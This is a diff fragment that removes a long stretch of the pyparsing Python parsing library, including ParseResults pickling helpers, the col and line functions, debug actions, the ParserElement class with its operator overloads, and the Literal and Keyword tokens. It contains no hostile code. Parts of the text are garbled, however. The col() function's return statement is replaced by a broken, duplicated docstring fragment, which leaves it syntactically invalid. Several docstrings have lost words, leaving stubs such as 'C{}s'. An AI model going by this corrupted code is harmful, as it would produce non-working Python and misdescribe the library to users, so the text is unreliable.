- if v.haskeys():
- out.append( v.dump(indent,depth+1) )
- elif any(isinstance(vv,ParseResults) for vv in v):
- for i,vv in enumerate(v):
- if isinstance(vv,ParseResults):
- out.append("\n%s%s[%d]:\n%s%s%s" % (indent,(' '*(depth+1)),i,indent,(' '*(depth+2)),vv.dump(indent,depth+2) ))
- else:
- out.append("\n%s%s[%d]:\n%s%s%s" % (indent,(' '*(depth+1)),i,indent,(' '*(depth+2)),_ustr(vv)))
- else:
- out.append(_ustr(v))
- else:
- out.append(_ustr(v))
- else:
- out.append(_ustr(v))
- return "".join(out)
-
- def pprint(self, *args, **kwargs):
- """Pretty-printer for parsed results as a list, using the C{pprint} module.
- Accepts additional positional or keyword args as defined for the
- C{pprint.pprint} method. (U{http://docs.python.org/3/library/pprint.html#pprint.pprint})"""
- pprint.pprint(self.asList(), *args, **kwargs)
-
- # add support for pickle protocol
- def __getstate__(self):
- return ( self.__toklist,
- ( self.__tokdict.copy(),
- self.__parent is not None and self.__parent() or None,
- self.__accumNames,
- self.__name ) )
-
- def __setstate__(self,state):
- self.__toklist = state[0]
- (self.__tokdict,
- par,
- inAccumNames,
- self.__name) = state[1]
- self.__accumNames = {}
- self.__accumNames.update(inAccumNames)
- if par is not None:
- self.__parent = wkref(par)
- else:
- self.__parent = None
-
- def __dir__(self):
- return dir(super(ParseResults,self)) + list(self.keys())
-
-collections.MutableMapping.register(ParseResults)
-
-def col (loc,strg):
- """Returns current column within a string, counting newlines as line separators.
- The first column is number 1.
-
- Note: the default parsing behavior is to expand tabs in the input string
- before starting the parsing process. See L{I{ParserElement.parseString}} for more information
- on parsing strings containing C{}s, and suggested methods to maintain a
- consistent view of the parsed string, the parse location, and line and column
- positions within the parsed string.
- """
- return (loc} for more information
- on parsing strings containing C{}s, and suggested methods to maintain a
- consistent view of the parsed string, the parse location, and line and column
- positions within the parsed string.
- """
- return strg.count("\n",0,loc) + 1
-
-def line( loc, strg ):
- """Returns the line of text containing loc within a string, counting newlines as line separators.
- """
- lastCR = strg.rfind("\n", 0, loc)
- nextCR = strg.find("\n", loc)
- if nextCR >= 0:
- return strg[lastCR+1:nextCR]
- else:
- return strg[lastCR+1:]
-
-def _defaultStartDebugAction( instring, loc, expr ):
- print (("Match " + _ustr(expr) + " at loc " + _ustr(loc) + "(%d,%d)" % ( lineno(loc,instring), col(loc,instring) )))
-
-def _defaultSuccessDebugAction( instring, startloc, endloc, expr, toks ):
- print ("Matched " + _ustr(expr) + " -> " + str(toks.asList()))
-
-def _defaultExceptionDebugAction( instring, loc, expr, exc ):
- print ("Exception raised:" + _ustr(exc))
-
-def nullDebugAction(*args):
- """'Do-nothing' debug action, to suppress debugging output during parsing."""
- pass
-
-# Only works on Python 3.x - nonlocal is toxic to Python 2 installs
-#~ 'decorator to trim function calls to match the arity of the target'
-#~ def _trim_arity(func, maxargs=3):
- #~ if func in singleArgBuiltins:
- #~ return lambda s,l,t: func(t)
- #~ limit = 0
- #~ foundArity = False
- #~ def wrapper(*args):
- #~ nonlocal limit,foundArity
- #~ while 1:
- #~ try:
- #~ ret = func(*args[limit:])
- #~ foundArity = True
- #~ return ret
- #~ except TypeError:
- #~ if limit == maxargs or foundArity:
- #~ raise
- #~ limit += 1
- #~ continue
- #~ return wrapper
-
-# this version is Python 2.x-3.x cross-compatible
-'decorator to trim function calls to match the arity of the target'
-def _trim_arity(func, maxargs=2):
- if func in singleArgBuiltins:
- return lambda s,l,t: func(t)
- limit = [0]
- foundArity = [False]
- def wrapper(*args):
- while 1:
- try:
- ret = func(*args[limit[0]:])
- foundArity[0] = True
- return ret
- except TypeError:
- if limit[0] <= maxargs and not foundArity[0]:
- limit[0] += 1
- continue
- raise
- return wrapper
-
-class ParserElement(object):
- """Abstract base level parser element class."""
- DEFAULT_WHITE_CHARS = " \n\t\r"
- verbose_stacktrace = False
-
- def setDefaultWhitespaceChars( chars ):
- """Overrides the default whitespace chars
- """
- ParserElement.DEFAULT_WHITE_CHARS = chars
- setDefaultWhitespaceChars = staticmethod(setDefaultWhitespaceChars)
-
- def inlineLiteralsUsing(cls):
- """
- Set class to be used for inclusion of string literals into a parser.
- """
- ParserElement.literalStringClass = cls
- inlineLiteralsUsing = staticmethod(inlineLiteralsUsing)
-
- def __init__( self, savelist=False ):
- self.parseAction = list()
- self.failAction = None
- #~ self.name = "" # don't define self.name, let subclasses try/except upcall
- self.strRepr = None
- self.resultsName = None
- self.saveAsList = savelist
- self.skipWhitespace = True
- self.whiteChars = ParserElement.DEFAULT_WHITE_CHARS
- self.copyDefaultWhiteChars = True
- self.mayReturnEmpty = False # used when checking for left-recursion
- self.keepTabs = False
- self.ignoreExprs = list()
- self.debug = False
- self.streamlined = False
- self.mayIndexError = True # used to optimize exception handling for subclasses that don't advance parse index
- self.errmsg = ""
- self.modalResults = True # used to mark results names as modal (report only last) or cumulative (list all)
- self.debugActions = ( None, None, None ) #custom debug actions
- self.re = None
- self.callPreparse = True # used to avoid redundant calls to preParse
- self.callDuringTry = False
-
- def copy( self ):
- """Make a copy of this C{ParserElement}. Useful for defining different parse actions
- for the same parsing pattern, using copies of the original parse element."""
- cpy = copy.copy( self )
- cpy.parseAction = self.parseAction[:]
- cpy.ignoreExprs = self.ignoreExprs[:]
- if self.copyDefaultWhiteChars:
- cpy.whiteChars = ParserElement.DEFAULT_WHITE_CHARS
- return cpy
-
- def setName( self, name ):
- """Define name for this expression, for use in debugging."""
- self.name = name
- self.errmsg = "Expected " + self.name
- if hasattr(self,"exception"):
- self.exception.msg = self.errmsg
- return self
-
- def setResultsName( self, name, listAllMatches=False ):
- """Define name for referencing matching tokens as a nested attribute
- of the returned parse results.
- NOTE: this returns a *copy* of the original C{ParserElement} object;
- this is so that the client can define a basic element, such as an
- integer, and reference it in multiple places with different names.
-
- You can also set results names using the abbreviated syntax,
- C{expr("name")} in place of C{expr.setResultsName("name")} -
- see L{I{__call__}<__call__>}.
- """
- newself = self.copy()
- if name.endswith("*"):
- name = name[:-1]
- listAllMatches=True
- newself.resultsName = name
- newself.modalResults = not listAllMatches
- return newself
-
- def setBreak(self,breakFlag = True):
- """Method to invoke the Python pdb debugger when this element is
- about to be parsed. Set C{breakFlag} to True to enable, False to
- disable.
- """
- if breakFlag:
- _parseMethod = self._parse
- def breaker(instring, loc, doActions=True, callPreParse=True):
- import pdb
- pdb.set_trace()
- return _parseMethod( instring, loc, doActions, callPreParse )
- breaker._originalParseMethod = _parseMethod
- self._parse = breaker
- else:
- if hasattr(self._parse,"_originalParseMethod"):
- self._parse = self._parse._originalParseMethod
- return self
-
- def setParseAction( self, *fns, **kwargs ):
- """Define action to perform when successfully matching parse element definition.
- Parse action fn is a callable method with 0-3 arguments, called as C{fn(s,loc,toks)},
- C{fn(loc,toks)}, C{fn(toks)}, or just C{fn()}, where:
- - s = the original string being parsed (see note below)
- - loc = the location of the matching substring
- - toks = a list of the matched tokens, packaged as a C{L{ParseResults}} object
- If the functions in fns modify the tokens, they can return them as the return
- value from fn, and the modified list of tokens will replace the original.
- Otherwise, fn does not need to return any value.
-
- Note: the default parsing behavior is to expand tabs in the input string
- before starting the parsing process. See L{I{parseString}} for more information
- on parsing strings containing C{}s, and suggested methods to maintain a
- consistent view of the parsed string, the parse location, and line and column
- positions within the parsed string.
- """
- self.parseAction = list(map(_trim_arity, list(fns)))
- self.callDuringTry = ("callDuringTry" in kwargs and kwargs["callDuringTry"])
- return self
-
- def addParseAction( self, *fns, **kwargs ):
- """Add parse action to expression's list of parse actions. See L{I{setParseAction}}."""
- self.parseAction += list(map(_trim_arity, list(fns)))
- self.callDuringTry = self.callDuringTry or ("callDuringTry" in kwargs and kwargs["callDuringTry"])
- return self
-
- def setFailAction( self, fn ):
- """Define action to perform if parsing fails at this expression.
- Fail acton fn is a callable function that takes the arguments
- C{fn(s,loc,expr,err)} where:
- - s = string being parsed
- - loc = location where expression match was attempted and failed
- - expr = the parse expression that failed
- - err = the exception thrown
- The function returns no value. It may throw C{L{ParseFatalException}}
- if it is desired to stop parsing immediately."""
- self.failAction = fn
- return self
-
- def _skipIgnorables( self, instring, loc ):
- exprsFound = True
- while exprsFound:
- exprsFound = False
- for e in self.ignoreExprs:
- try:
- while 1:
- loc,dummy = e._parse( instring, loc )
- exprsFound = True
- except ParseException:
- pass
- return loc
-
- def preParse( self, instring, loc ):
- if self.ignoreExprs:
- loc = self._skipIgnorables( instring, loc )
-
- if self.skipWhitespace:
- wt = self.whiteChars
- instrlen = len(instring)
- while loc < instrlen and instring[loc] in wt:
- loc += 1
-
- return loc
-
- def parseImpl( self, instring, loc, doActions=True ):
- return loc, []
-
- def postParse( self, instring, loc, tokenlist ):
- return tokenlist
-
- #~ @profile
- def _parseNoCache( self, instring, loc, doActions=True, callPreParse=True ):
- debugging = ( self.debug ) #and doActions )
-
- if debugging or self.failAction:
- #~ print ("Match",self,"at loc",loc,"(%d,%d)" % ( lineno(loc,instring), col(loc,instring) ))
- if (self.debugActions[0] ):
- self.debugActions[0]( instring, loc, self )
- if callPreParse and self.callPreparse:
- preloc = self.preParse( instring, loc )
- else:
- preloc = loc
- tokensStart = preloc
- try:
- try:
- loc,tokens = self.parseImpl( instring, preloc, doActions )
- except IndexError:
- raise ParseException( instring, len(instring), self.errmsg, self )
- except ParseBaseException as err:
- #~ print ("Exception raised:", err)
- if self.debugActions[2]:
- self.debugActions[2]( instring, tokensStart, self, err )
- if self.failAction:
- self.failAction( instring, tokensStart, self, err )
- raise
- else:
- if callPreParse and self.callPreparse:
- preloc = self.preParse( instring, loc )
- else:
- preloc = loc
- tokensStart = preloc
- if self.mayIndexError or loc >= len(instring):
- try:
- loc,tokens = self.parseImpl( instring, preloc, doActions )
- except IndexError:
- raise ParseException( instring, len(instring), self.errmsg, self )
- else:
- loc,tokens = self.parseImpl( instring, preloc, doActions )
-
- tokens = self.postParse( instring, loc, tokens )
-
- retTokens = ParseResults( tokens, self.resultsName, asList=self.saveAsList, modal=self.modalResults )
- if self.parseAction and (doActions or self.callDuringTry):
- if debugging:
- try:
- for fn in self.parseAction:
- tokens = fn( instring, tokensStart, retTokens )
- if tokens is not None:
- retTokens = ParseResults( tokens,
- self.resultsName,
- asList=self.saveAsList and isinstance(tokens,(ParseResults,list)),
- modal=self.modalResults )
- except ParseBaseException as err:
- #~ print "Exception raised in user parse action:", err
- if (self.debugActions[2] ):
- self.debugActions[2]( instring, tokensStart, self, err )
- raise
- else:
- for fn in self.parseAction:
- tokens = fn( instring, tokensStart, retTokens )
- if tokens is not None:
- retTokens = ParseResults( tokens,
- self.resultsName,
- asList=self.saveAsList and isinstance(tokens,(ParseResults,list)),
- modal=self.modalResults )
-
- if debugging:
- #~ print ("Matched",self,"->",retTokens.asList())
- if (self.debugActions[1] ):
- self.debugActions[1]( instring, tokensStart, loc, self, retTokens )
-
- return loc, retTokens
-
- def tryParse( self, instring, loc ):
- try:
- return self._parse( instring, loc, doActions=False )[0]
- except ParseFatalException:
- raise ParseException( instring, loc, self.errmsg, self)
-
- # this method gets repeatedly called during backtracking with the same arguments -
- # we can cache these arguments and save ourselves the trouble of re-parsing the contained expression
- def _parseCache( self, instring, loc, doActions=True, callPreParse=True ):
- lookup = (self,instring,loc,callPreParse,doActions)
- if lookup in ParserElement._exprArgCache:
- value = ParserElement._exprArgCache[ lookup ]
- if isinstance(value, Exception):
- raise value
- return (value[0],value[1].copy())
- else:
- try:
- value = self._parseNoCache( instring, loc, doActions, callPreParse )
- ParserElement._exprArgCache[ lookup ] = (value[0],value[1].copy())
- return value
- except ParseBaseException as pe:
- pe.__traceback__ = None
- ParserElement._exprArgCache[ lookup ] = pe
- raise
-
- _parse = _parseNoCache
-
- # argument cache for optimizing repeated calls when backtracking through recursive expressions
- _exprArgCache = {}
- def resetCache():
- ParserElement._exprArgCache.clear()
- resetCache = staticmethod(resetCache)
-
- _packratEnabled = False
- def enablePackrat():
- """Enables "packrat" parsing, which adds memoizing to the parsing logic.
- Repeated parse attempts at the same string location (which happens
- often in many complex grammars) can immediately return a cached value,
- instead of re-executing parsing/validating code. Memoizing is done of
- both valid results and parsing exceptions.
-
- This speedup may break existing programs that use parse actions that
- have side-effects. For this reason, packrat parsing is disabled when
- you first import pyparsing. To activate the packrat feature, your
- program must call the class method C{ParserElement.enablePackrat()}. If
- your program uses C{psyco} to "compile as you go", you must call
- C{enablePackrat} before calling C{psyco.full()}. If you do not do this,
- Python will crash. For best results, call C{enablePackrat()} immediately
- after importing pyparsing.
- """
- if not ParserElement._packratEnabled:
- ParserElement._packratEnabled = True
- ParserElement._parse = ParserElement._parseCache
- enablePackrat = staticmethod(enablePackrat)
-
- def parseString( self, instring, parseAll=False ):
- """Execute the parse expression with the given string.
- This is the main interface to the client code, once the complete
- expression has been built.
-
- If you want the grammar to require that the entire input string be
- successfully parsed, then set C{parseAll} to True (equivalent to ending
- the grammar with C{L{StringEnd()}}).
-
- Note: C{parseString} implicitly calls C{expandtabs()} on the input string,
- in order to report proper column numbers in parse actions.
- If the input string contains tabs and
- the grammar uses parse actions that use the C{loc} argument to index into the
- string being parsed, you can ensure you have a consistent view of the input
- string by:
- - calling C{parseWithTabs} on your grammar before calling C{parseString}
- (see L{I{parseWithTabs}})
- - define your parse action using the full C{(s,loc,toks)} signature, and
- reference the input string using the parse action's C{s} argument
- - explictly expand the tabs in your input string before calling
- C{parseString}
- """
- ParserElement.resetCache()
- if not self.streamlined:
- self.streamline()
- #~ self.saveAsList = True
- for e in self.ignoreExprs:
- e.streamline()
- if not self.keepTabs:
- instring = instring.expandtabs()
- try:
- loc, tokens = self._parse( instring, 0 )
- if parseAll:
- loc = self.preParse( instring, loc )
- se = Empty() + StringEnd()
- se._parse( instring, loc )
- except ParseBaseException as exc:
- if ParserElement.verbose_stacktrace:
- raise
- else:
- # catch and re-raise exception from here, clears out pyparsing internal stack trace
- raise exc
- else:
- return tokens
-
- def scanString( self, instring, maxMatches=_MAX_INT, overlap=False ):
- """Scan the input string for expression matches. Each match will return the
- matching tokens, start location, and end location. May be called with optional
- C{maxMatches} argument, to clip scanning after 'n' matches are found. If
- C{overlap} is specified, then overlapping matches will be reported.
-
- Note that the start and end locations are reported relative to the string
- being parsed. See L{I{parseString}} for more information on parsing
- strings with embedded tabs."""
- if not self.streamlined:
- self.streamline()
- for e in self.ignoreExprs:
- e.streamline()
-
- if not self.keepTabs:
- instring = _ustr(instring).expandtabs()
- instrlen = len(instring)
- loc = 0
- preparseFn = self.preParse
- parseFn = self._parse
- ParserElement.resetCache()
- matches = 0
- try:
- while loc <= instrlen and matches < maxMatches:
- try:
- preloc = preparseFn( instring, loc )
- nextLoc,tokens = parseFn( instring, preloc, callPreParse=False )
- except ParseException:
- loc = preloc+1
- else:
- if nextLoc > loc:
- matches += 1
- yield tokens, preloc, nextLoc
- if overlap:
- nextloc = preparseFn( instring, loc )
- if nextloc > loc:
- loc = nextLoc
- else:
- loc += 1
- else:
- loc = nextLoc
- else:
- loc = preloc+1
- except ParseBaseException as exc:
- if ParserElement.verbose_stacktrace:
- raise
- else:
- # catch and re-raise exception from here, clears out pyparsing internal stack trace
- raise exc
-
- def transformString( self, instring ):
- """Extension to C{L{scanString}}, to modify matching text with modified tokens that may
- be returned from a parse action. To use C{transformString}, define a grammar and
- attach a parse action to it that modifies the returned token list.
- Invoking C{transformString()} on a target string will then scan for matches,
- and replace the matched text patterns according to the logic in the parse
- action. C{transformString()} returns the resulting transformed string."""
- out = []
- lastE = 0
- # force preservation of s, to minimize unwanted transformation of string, and to
- # keep string locs straight between transformString and scanString
- self.keepTabs = True
- try:
- for t,s,e in self.scanString( instring ):
- out.append( instring[lastE:s] )
- if t:
- if isinstance(t,ParseResults):
- out += t.asList()
- elif isinstance(t,list):
- out += t
- else:
- out.append(t)
- lastE = e
- out.append(instring[lastE:])
- out = [o for o in out if o]
- return "".join(map(_ustr,_flatten(out)))
- except ParseBaseException as exc:
- if ParserElement.verbose_stacktrace:
- raise
- else:
- # catch and re-raise exception from here, clears out pyparsing internal stack trace
- raise exc
-
- def searchString( self, instring, maxMatches=_MAX_INT ):
- """Another extension to C{L{scanString}}, simplifying the access to the tokens found
- to match the given parse expression. May be called with optional
- C{maxMatches} argument, to clip searching after 'n' matches are found.
- """
- try:
- return ParseResults([ t for t,s,e in self.scanString( instring, maxMatches ) ])
- except ParseBaseException as exc:
- if ParserElement.verbose_stacktrace:
- raise
- else:
- # catch and re-raise exception from here, clears out pyparsing internal stack trace
- raise exc
-
- def __add__(self, other ):
- """Implementation of + operator - returns C{L{And}}"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return And( [ self, other ] )
-
- def __radd__(self, other ):
- """Implementation of + operator when left operand is not a C{L{ParserElement}}"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return other + self
-
- def __sub__(self, other):
- """Implementation of - operator, returns C{L{And}} with error stop"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return And( [ self, And._ErrorStop(), other ] )
-
- def __rsub__(self, other ):
- """Implementation of - operator when left operand is not a C{L{ParserElement}}"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return other - self
-
- def __mul__(self,other):
- """Implementation of * operator, allows use of C{expr * 3} in place of
- C{expr + expr + expr}. Expressions may also me multiplied by a 2-integer
- tuple, similar to C{{min,max}} multipliers in regular expressions. Tuples
- may also include C{None} as in:
- - C{expr*(n,None)} or C{expr*(n,)} is equivalent
- to C{expr*n + L{ZeroOrMore}(expr)}
- (read as "at least n instances of C{expr}")
- - C{expr*(None,n)} is equivalent to C{expr*(0,n)}
- (read as "0 to n instances of C{expr}")
- - C{expr*(None,None)} is equivalent to C{L{ZeroOrMore}(expr)}
- - C{expr*(1,None)} is equivalent to C{L{OneOrMore}(expr)}
-
- Note that C{expr*(None,n)} does not raise an exception if
- more than n exprs exist in the input stream; that is,
- C{expr*(None,n)} does not enforce a maximum number of expr
- occurrences. If this behavior is desired, then write
- C{expr*(None,n) + ~expr}
-
- """
- if isinstance(other,int):
- minElements, optElements = other,0
- elif isinstance(other,tuple):
- other = (other + (None, None))[:2]
- if other[0] is None:
- other = (0, other[1])
- if isinstance(other[0],int) and other[1] is None:
- if other[0] == 0:
- return ZeroOrMore(self)
- if other[0] == 1:
- return OneOrMore(self)
- else:
- return self*other[0] + ZeroOrMore(self)
- elif isinstance(other[0],int) and isinstance(other[1],int):
- minElements, optElements = other
- optElements -= minElements
- else:
- raise TypeError("cannot multiply 'ParserElement' and ('%s','%s') objects", type(other[0]),type(other[1]))
- else:
- raise TypeError("cannot multiply 'ParserElement' and '%s' objects", type(other))
-
- if minElements < 0:
- raise ValueError("cannot multiply ParserElement by negative value")
- if optElements < 0:
- raise ValueError("second tuple value must be greater or equal to first tuple value")
- if minElements == optElements == 0:
- raise ValueError("cannot multiply ParserElement by 0 or (0,0)")
-
- if (optElements):
- def makeOptionalList(n):
- if n>1:
- return Optional(self + makeOptionalList(n-1))
- else:
- return Optional(self)
- if minElements:
- if minElements == 1:
- ret = self + makeOptionalList(optElements)
- else:
- ret = And([self]*minElements) + makeOptionalList(optElements)
- else:
- ret = makeOptionalList(optElements)
- else:
- if minElements == 1:
- ret = self
- else:
- ret = And([self]*minElements)
- return ret
-
- def __rmul__(self, other):
- return self.__mul__(other)
-
- def __or__(self, other ):
- """Implementation of | operator - returns C{L{MatchFirst}}"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return MatchFirst( [ self, other ] )
-
- def __ror__(self, other ):
- """Implementation of | operator when left operand is not a C{L{ParserElement}}"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return other | self
-
- def __xor__(self, other ):
- """Implementation of ^ operator - returns C{L{Or}}"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return Or( [ self, other ] )
-
- def __rxor__(self, other ):
- """Implementation of ^ operator when left operand is not a C{L{ParserElement}}"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return other ^ self
-
- def __and__(self, other ):
- """Implementation of & operator - returns C{L{Each}}"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return Each( [ self, other ] )
-
- def __rand__(self, other ):
- """Implementation of & operator when left operand is not a C{L{ParserElement}}"""
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- if not isinstance( other, ParserElement ):
- warnings.warn("Cannot combine element of type %s with ParserElement" % type(other),
- SyntaxWarning, stacklevel=2)
- return None
- return other & self
-
- def __invert__( self ):
- """Implementation of ~ operator - returns C{L{NotAny}}"""
- return NotAny( self )
-
- def __call__(self, name=None):
- """Shortcut for C{L{setResultsName}}, with C{listAllMatches=default}::
- userdata = Word(alphas).setResultsName("name") + Word(nums+"-").setResultsName("socsecno")
- could be written as::
- userdata = Word(alphas)("name") + Word(nums+"-")("socsecno")
-
- If C{name} is given with a trailing C{'*'} character, then C{listAllMatches} will be
- passed as C{True}.
-
- If C{name} is omitted, same as calling C{L{copy}}.
- """
- if name is not None:
- return self.setResultsName(name)
- else:
- return self.copy()
-
- def suppress( self ):
- """Suppresses the output of this C{ParserElement}; useful to keep punctuation from
- cluttering up returned output.
- """
- return Suppress( self )
-
- def leaveWhitespace( self ):
- """Disables the skipping of whitespace before matching the characters in the
- C{ParserElement}'s defined pattern. This is normally only used internally by
- the pyparsing module, but may be needed in some whitespace-sensitive grammars.
- """
- self.skipWhitespace = False
- return self
-
- def setWhitespaceChars( self, chars ):
- """Overrides the default whitespace chars
- """
- self.skipWhitespace = True
- self.whiteChars = chars
- self.copyDefaultWhiteChars = False
- return self
-
- def parseWithTabs( self ):
- """Overrides default behavior to expand C{}s to spaces before parsing the input string.
- Must be called before C{parseString} when the input grammar contains elements that
- match C{} characters."""
- self.keepTabs = True
- return self
-
- def ignore( self, other ):
- """Define expression to be ignored (e.g., comments) while doing pattern
- matching; may be called repeatedly, to define multiple comment or other
- ignorable patterns.
- """
- if isinstance( other, Suppress ):
- if other not in self.ignoreExprs:
- self.ignoreExprs.append( other.copy() )
- else:
- self.ignoreExprs.append( Suppress( other.copy() ) )
- return self
-
- def setDebugActions( self, startAction, successAction, exceptionAction ):
- """Enable display of debugging messages while doing pattern matching."""
- self.debugActions = (startAction or _defaultStartDebugAction,
- successAction or _defaultSuccessDebugAction,
- exceptionAction or _defaultExceptionDebugAction)
- self.debug = True
- return self
-
- def setDebug( self, flag=True ):
- """Enable display of debugging messages while doing pattern matching.
- Set C{flag} to True to enable, False to disable."""
- if flag:
- self.setDebugActions( _defaultStartDebugAction, _defaultSuccessDebugAction, _defaultExceptionDebugAction )
- else:
- self.debug = False
- return self
-
- def __str__( self ):
- return self.name
-
- def __repr__( self ):
- return _ustr(self)
-
- def streamline( self ):
- self.streamlined = True
- self.strRepr = None
- return self
-
- def checkRecursion( self, parseElementList ):
- pass
-
- def validate( self, validateTrace=[] ):
- """Check defined expressions for valid structure, check for infinite recursive definitions."""
- self.checkRecursion( [] )
-
- def parseFile( self, file_or_filename, parseAll=False ):
- """Execute the parse expression on the given file or filename.
- If a filename is specified (instead of a file object),
- the entire file is opened, read, and closed before parsing.
- """
- try:
- file_contents = file_or_filename.read()
- except AttributeError:
- f = open(file_or_filename, "r")
- file_contents = f.read()
- f.close()
- try:
- return self.parseString(file_contents, parseAll)
- except ParseBaseException as exc:
- if ParserElement.verbose_stacktrace:
- raise
- else:
- # catch and re-raise exception from here, clears out pyparsing internal stack trace
- raise exc
-
- def __eq__(self,other):
- if isinstance(other, ParserElement):
- return self is other or self.__dict__ == other.__dict__
- elif isinstance(other, basestring):
- try:
- self.parseString(_ustr(other), parseAll=True)
- return True
- except ParseBaseException:
- return False
- else:
- return super(ParserElement,self)==other
-
- def __ne__(self,other):
- return not (self == other)
-
- def __hash__(self):
- return hash(id(self))
-
- def __req__(self,other):
- return self == other
-
- def __rne__(self,other):
- return not (self == other)
-
-
-class Token(ParserElement):
- """Abstract C{ParserElement} subclass, for defining atomic matching patterns."""
- def __init__( self ):
- super(Token,self).__init__( savelist=False )
-
- def setName(self, name):
- s = super(Token,self).setName(name)
- self.errmsg = "Expected " + self.name
- return s
-
-
-class Empty(Token):
- """An empty token, will always match."""
- def __init__( self ):
- super(Empty,self).__init__()
- self.name = "Empty"
- self.mayReturnEmpty = True
- self.mayIndexError = False
-
-
-class NoMatch(Token):
- """A token that will never match."""
- def __init__( self ):
- super(NoMatch,self).__init__()
- self.name = "NoMatch"
- self.mayReturnEmpty = True
- self.mayIndexError = False
- self.errmsg = "Unmatchable token"
-
- def parseImpl( self, instring, loc, doActions=True ):
- raise ParseException(instring, loc, self.errmsg, self)
-
-
-class Literal(Token):
- """Token to exactly match a specified string."""
- def __init__( self, matchString ):
- super(Literal,self).__init__()
- self.match = matchString
- self.matchLen = len(matchString)
- try:
- self.firstMatchChar = matchString[0]
- except IndexError:
- warnings.warn("null string passed to Literal; use Empty() instead",
- SyntaxWarning, stacklevel=2)
- self.__class__ = Empty
- self.name = '"%s"' % _ustr(self.match)
- self.errmsg = "Expected " + self.name
- self.mayReturnEmpty = False
- self.mayIndexError = False
-
- # Performance tuning: this routine gets called a *lot*
- # if this is a single character match string and the first character matches,
- # short-circuit as quickly as possible, and avoid calling startswith
- #~ @profile
- def parseImpl( self, instring, loc, doActions=True ):
- if (instring[loc] == self.firstMatchChar and
- (self.matchLen==1 or instring.startswith(self.match,loc)) ):
- return loc+self.matchLen, self.match
- raise ParseException(instring, loc, self.errmsg, self)
-_L = Literal
-ParserElement.literalStringClass = Literal
-
-class Keyword(Token):
- """Token to exactly match a specified string as a keyword, that is, it must be
- immediately followed by a non-keyword character. Compare with C{L{Literal}}::
- Literal("if") will match the leading C{'if'} in C{'ifAndOnlyIf'}.
- Keyword("if") will not; it will only match the leading C{'if'} in C{'if x=1'}, or C{'if(y==2)'}
- Accepts two optional constructor arguments in addition to the keyword string:
- C{identChars} is a string of characters that would be valid identifier characters,
- defaulting to all alphanumerics + "_" and "$"; C{caseless} allows case-insensitive
- matching, default is C{False}.
- """
- DEFAULT_KEYWORD_CHARS = alphanums+"_$"
-
- def __init__( self, matchString, identChars=DEFAULT_KEYWORD_CHARS, caseless=False ):
- super(Keyword,self).__init__()
- self.match = matchString
- self.matchLen = len(matchString)
- try:
- self.firstMatchChar = matchString[0]
- except IndexError:
- warnings.warn("null string passed to Keyword; use Empty() instead",
- SyntaxWarning, stacklevel=2)
- self.name = '"%s"' % self.match
- self.errmsg = "Expected " + self.name
- self.mayReturnEmpty = False
- self.mayIndexError = False
- self.caseless = caseless
- if caseless:
- self.caselessmatch = matchString.upper()
- identChars = identChars.upper()
- self.identChars = set(identChars)
-
- def parseImpl( self, instring, loc, doActions=True ):
- if self.caseless:
- if ( (instring[ loc:loc+self.matchLen ].upper() == self.caselessmatch) and
- (loc >= len(instring)-self.matchLen or instring[loc+self.matchLen].upper() not in self.identChars) and
- (loc == 0 or instring[loc-1].upper() not in self.identChars) ):
- return loc+self.matchLen, self.match
- else:
- if (instring[loc] == self.firstMatchChar and
- (self.matchLen==1 or instring.startswith(self.match,loc)) and
- (loc >= len(instring)-self.matchLen or instring[loc+self.matchLen] not in self.identChars) and
- (loc == 0 or instring[loc-1] not in self.identChars) ):
- return loc+self.matchLen, self.match
- raise ParseException(instring, loc, self.errmsg, self)
-
- def copy(self):
- c = super(Keyword,self).copy()
- c.identChars = Keyword.DEFAULT_KEYWORD_CHARS
- return c
-
- def setDefaultKeywordChars( chars ):
- """Overrides the default Keyword chars
- """
- Keyword.DEFAULT_KEYWORD_CHARS = chars
- setDefaultKeywordChars = staticmethod(setDefaultKeywordChars)
-
-class CaselessLiteral(Literal):
- """Token to match a specified string, ignoring case of letters.
- Note: the matched results will always be in the case of the given
- match string, NOT the case of the input text.
- """
- def __init__( self, matchString ):
- super(CaselessLiteral,self).__init__( matchString.upper() )
- # Preserve the defining literal.
- self.returnString = matchString
- self.name = "'%s'" % self.returnString
- self.errmsg = "Expected " + self.name
-
- def parseImpl( self, instring, loc, doActions=True ):
- if instring[ loc:loc+self.matchLen ].upper() == self.match:
- return loc+self.matchLen, self.returnString
- raise ParseException(instring, loc, self.errmsg, self)
-
-class CaselessKeyword(Keyword):
- def __init__( self, matchString, identChars=Keyword.DEFAULT_KEYWORD_CHARS ):
- super(CaselessKeyword,self).__init__( matchString, identChars, caseless=True )
-
